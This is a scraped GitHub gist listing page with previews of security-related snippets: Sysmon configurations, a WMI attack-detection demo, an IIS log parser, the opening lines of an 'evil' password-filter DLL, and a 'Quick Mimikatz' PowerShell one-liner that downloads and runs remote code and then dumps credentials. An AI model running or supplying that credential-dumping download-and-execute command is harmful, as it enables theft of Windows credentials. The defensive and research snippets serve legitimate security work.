Skip to content

Instantly share code, notes, and snippets.


Block or report user

Report or block mendel129

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
gfoss / Quick-Mimikatz
Last active Feb 12, 2020
Quick Mimikatz
View Quick-Mimikatz
*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!*
#mimikatz [local]
IEX (New-Object Net.WebClient).DownloadString(""); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;
#encoded-mimikatz [local]
Neo23x0 / config-server.xml
Last active Nov 7, 2019
Sysmon Base Configuration - Windows Server
View config-server.xml
This is a Microsoft Sysmon configuation to be used on Windows server systems
v0.2.1 December 2016
Florian Roth
The focus of this configuration is
- hacking activity on servers / lateral movement (bad admin, attacker)
It is not focussed on
- malware detection (execution)
- malware detection (network connections)
Neo23x0 / config-client.xml
Last active Oct 22, 2019
Sysmon Base Configuration - Workstations
View config-client.xml
This is a Microsoft Sysmon configuration to be used on Windows workstations
v0.2.1 December 2016
Florian Roth (with the help and ideas of others)
The focus of this configuration is
- malware detection (execution)
- malware detection (network connections)
- exploit detection
It is not focussed on
mattifestation / WMI_attack_detection.ps1
Last active Sep 16, 2019
BlueHat 2016 - WMI attack detection demo
View WMI_attack_detection.ps1
#region Scriptblocks that will execute upon alert trigger
$LateralMovementDetected = {
$Event = $EventArgs.NewEvent
$EventTime = [DateTime]::FromFileTime($Event.TIME_CREATED)
$MethodName = $Event.MethodName
$Namespace = $Event.Namespace
$Object = $Event.ObjectPath
$User = $Event.User
mubix / evilpassfilter.cpp
Created Sep 10, 2013
Evil "Password Filter"
View evilpassfilter.cpp
#include <windows.h>
#include <stdio.h>
#include <WinInet.h>
#include <ntsecapi.h>
void writeToLog(const char* szString)
FILE* pFile = fopen("c:\\windows\\temp\\logFile.txt", "a+");
if (NULL == pFile)
jstangroome / ConvertFrom-IISW3CLog.ps1
Created Aug 8, 2013
Function to convert lines in an IIS W3C log file to PowerShell objects
View ConvertFrom-IISW3CLog.ps1
function ConvertFrom-IISW3CLog {
param (
[Parameter(Mandatory, ValueFromPipeline, ValueFromPipelineByPropertyName)]
process {
You can’t perform that action at this time.